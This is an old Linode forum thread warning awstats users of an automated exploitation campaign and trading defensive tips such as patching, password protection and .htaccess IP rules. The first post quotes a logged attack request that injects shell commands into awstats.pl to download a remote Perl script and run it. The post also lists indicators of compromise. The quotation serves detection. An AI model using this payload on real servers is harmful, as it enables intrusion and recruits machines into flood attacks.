Linode Forum
Linode Community Forums 		 FAQFAQ    SearchSearch    MembersMembers      Register Register 
 LoginLogin [ Anonymous ] 
Post new topic  Reply to topic

Board index » Linux Community Forums » General Discussion
  Previous topic | Next topic 
Author Message
jmeyers
PostPosted: Sat Apr 23, 2005 8:15 pm 
Offline
Senior Newbie

Joined: Sat Feb 14, 2004 5:34 pm
Posts: 5
Website: http://www.themeyers.us
AOL: jameyers14
Location: Boston, MA
If you use the awstats web statistics perl script, be warned that there is an automated process exploiting buffer overflow vulnerabilities and spawning off flood attacks. Anyone who uses awstats should check ASAP for the following things to see if you have been compromised:

1) Entries in your apache access logs with the following form: GET /awstats/awstats.pl?configdir
=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;
perl%20a1.txt|

2) The presense of running processes named 'udp.pl, egx, or f3', or the presense of these files on the filesystem (most likely in /var/tmp).

3) Lots of UDP traffic directed against random hosts (the processes use a random number generator using /dev/urandom to generate targets).

Fix: Remove, disable, or password protect awstats.pl. Unknown if there is a fix available.

John
Top
   
Reply with quote  
mikegrb
 Post subject:
PostPosted: Sun Apr 24, 2005 12:15 am 
Offline
Linode Staff
User avatar

Joined: Fri Oct 17, 2003 12:38 am
Posts: 287
Location: Dr Wierd's Lab, South Jersey Shore
Version 6.4 of awstats was released a bit over a month ago when this vulnerability was discovered. If you have installed awstats via apt-get or similiar and regularly run apt-get update && apt-get upgrade or your distribution of choice's equivilent, you should already have the fixed version installed but should double check this.

Michael
Top
   
Reply with quote  
tierra
 Post subject:
PostPosted: Mon Apr 25, 2005 12:15 am 
Offline
Senior Member

Joined: Fri Aug 06, 2004 5:49 pm
Posts: 158
Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.
Top
   
Reply with quote  
jmeyers
 Post subject:
PostPosted: Mon Apr 25, 2005 6:27 pm 
Offline
Senior Newbie

Joined: Sat Feb 14, 2004 5:34 pm
Posts: 5
Website: http://www.themeyers.us
AOL: jameyers14
Location: Boston, MA
Probably an entire new thread, but in theory running Apache in a SELinux sandbox would go a long way to limit the consequences of an exploit of any script or the server process itself. Is SELinux even possible under UML (2.6 kernel)?

John
Top
   
Reply with quote  
jhmartin
 Post subject:
PostPosted: Thu Jan 05, 2006 4:46 pm 
Offline
Junior Member

Joined: Mon Apr 26, 2004 5:03 pm
Posts: 47
SELinux isn't installed in the UML kernel, so linodes can't take advantage of it.
Top
   
Reply with quote  
Jay
 Post subject:
PostPosted: Thu Jan 05, 2006 5:40 pm 
Offline
Senior Member

Joined: Sun Nov 14, 2004 6:37 pm
Posts: 138
Website: http://oldos.org
WLM: jasonlfaulkner@hotmail.com
Yahoo Messenger: jasonfncsu
AOL: jaylfaulkner
Location: NC, USA
Easiest way to protect your awstats? chmod 700 the folder when not viewing stats :)

_________________
Jay Faulkner
http://oldos.org
Top
   
Reply with quote  
ptomblin
 Post subject:
PostPosted: Fri Jan 06, 2006 9:32 pm 
Offline
Junior Member

Joined: Wed May 04, 2005 9:08 pm
Posts: 24
Website: http://xcski.com/blogs/pt/
Location: Rochester NY
tierra wrote:
Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.



I keep a lot of things like this (webalizer, server-status, munin) protected by .htaccess files that only allow access from my own IP (and the proxy server at work).
Code:
    Order deny,allow
    Deny from all
    Allow from 192.168.1.0/24
    Allow from 111.222.333.0/24
    Allow from 127.0.0.0/8
Top
   
Reply with quote  
Display posts from previous:  Sort by  
Post new topic  Reply to topic

Board index » Linux Community Forums » General Discussion


Who is online

Users browsing this forum: wolfsoft and 6 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
RSS

Powered by phpBB® Forum Software © phpBB Group